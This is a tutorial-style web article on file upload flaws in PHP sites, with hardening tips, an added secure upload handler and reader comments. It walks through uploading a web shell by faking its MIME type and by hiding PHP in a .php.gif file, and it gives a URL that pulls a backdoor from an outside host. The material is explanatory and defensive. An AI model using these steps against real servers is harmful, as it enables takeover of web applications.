Last updated: July 16, 2022
An upload script transfers files from your machine (the client) to the site (the server), but upload scripts often contain vulnerabilities.
The upload flaw allows files with an unauthorized extension to be uploaded. It is caused by an incorrectly configured upload script or by a complete lack of security checks, and it is generally found in image upload scripts. It is one of the most dangerous loopholes.
How does the Upload flaw work?
The goal of this flaw is to upload a file with an unauthorized extension (for example, PHP code) so as to gain access to the target server. If the upload form of your site is not secure, a hacker could easily upload a malicious PHP file (a web shell, for example) that would allow him to take total control of your web application and your server.
How could a hacker exploit the Upload flaw?
In this part, I will explain the different ways to exploit the Upload flaw.
1) Bypass MIME verification
The MIME type of a file describes the type of content the file is made up of. For example, the MIME type of GIF images is "image/gif" and the MIME type of JPG images is "image/jpeg".
Some upload scripts only check whether the MIME type corresponds to the authorized file types. However, a MIME check is not sufficient, because a hacker can bypass it.
A malicious user can upload a PHP file by tricking the server into believing the file is a JPEG image.
Here's how to do it:
- Download Firefox
- Download Tamper Data
- Open a vulnerable site that contains an upload script
- Start Tamper Data
- Start alteration
To start the alteration, open Firefox then click on "tools" then on "alter data" and finally "start alteration".
- Now select a PHP file you want to upload to the vulnerable server and click on upload.
- A new window opens, click on Alter
- You have the "header". Now in POST_DATA, change "application/octet-stream" to "image/jpg" then click on OK and admire the result.
The Shell has been uploaded successfully! It passed for a JPEG image.
The hacker can now execute the PHP file with the URL address of the latter.
2) Double extension
Some scripts check only the file extension, but a hacker can bypass this protection by using a double extension (depending on the host).
- We will first create a GIF file. To do this, open the Paint program, create an image of a few pixels.
- Then we open our GIF file with a hex editor (for me Freed, it's the best).
- Now imagine that we insert PHP code in our GIF and that we give it a double extension (.php.gif).
- In our editor, there is an empty space to add an html header as well as the include function.
- So we end up with our file.php.gif.
- We upload it, and the upload now succeeds.
- We go to our file.php.gif?Test=http://www.sitepirate.com/backdoor.php. And so our backdoor is in place.
Upload security
Here are some tips that will help you secure this vulnerability:
- Never trust what the client sends.
- Check the Apache configuration in order to act accordingly.
- Do not put the .htaccess in the upload directory.
- Do not allow file overwriting.
- Generate a random name for the uploaded file and save the name in a database.
- Do not allow the index of the upload directory to be listed.
- Assign the correct permissions to the directory.
- Check the MIME type with getimagesize() and the file extension.
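Several of the tips above combined in one PHP handler, as an added example that is not code from the original article. The upload directory path, the form field name `image` and the function names are assumptions.

```php
<?php
// Added example, not from the original article. UPLOAD_DIR, the "image"
// form field and both function names are assumptions for illustration.
const UPLOAD_DIR = '/var/www/uploads';   // assumed path; set its permissions separately
const EXT_TO_TYPE = [
    'gif' => IMAGETYPE_GIF, 'jpg' => IMAGETYPE_JPEG,
    'jpeg' => IMAGETYPE_JPEG, 'png' => IMAGETYPE_PNG,
];

// Returns the extension the server will write, or null to reject the upload.
function validated_extension(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // $file['type'] is the Content-Type sent by the client; it is never read here.
    // Exactly one extension is accepted, so "file.php.gif" is rejected.
    $parts = explode('.', strtolower(basename((string) $file['name'])));
    if (count($parts) !== 2 || !isset(EXT_TO_TYPE[$parts[1]])) {
        return null;
    }
    // getimagesize() reads the image header of the temporary file. It does
    // not prove the rest of the file is harmless, hence the renaming below.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== EXT_TO_TYPE[$parts[1]]) {
        return null;
    }
    return image_type_to_extension($info[2], false);
}

// Stores the file under a random name; returns that name or null on rejection.
function store_upload(array $file): ?string
{
    $ext = validated_extension($file);
    if ($ext === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // nothing client-chosen in the name
    $dest = UPLOAD_DIR . '/' . $name;
    if (file_exists($dest) || !move_uploaded_file($file['tmp_name'], $dest)) {
        return null;                                  // never overwrite an existing file
    }
    chmod($dest, 0644);                               // readable, no execute bit
    return $name;   // save this name next to the original one in the database
}

if (isset($_FILES['image'])) {
    http_response_code(store_upload($_FILES['image']) === null ? 400 : 201);
}
```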
thanks a lot
Thank you very much
I would still like to know if there really are people who entrust the execution of “.gif” files to PHP. Basically, the mime_module part of Apache only associates the type application/x-httpd-php with “.php” and “.php3”. So if you have chosen to shoot yourself in the foot by adding the ".gif" type on a server that allows the upload of ".gif" files, you should seriously review your security policy.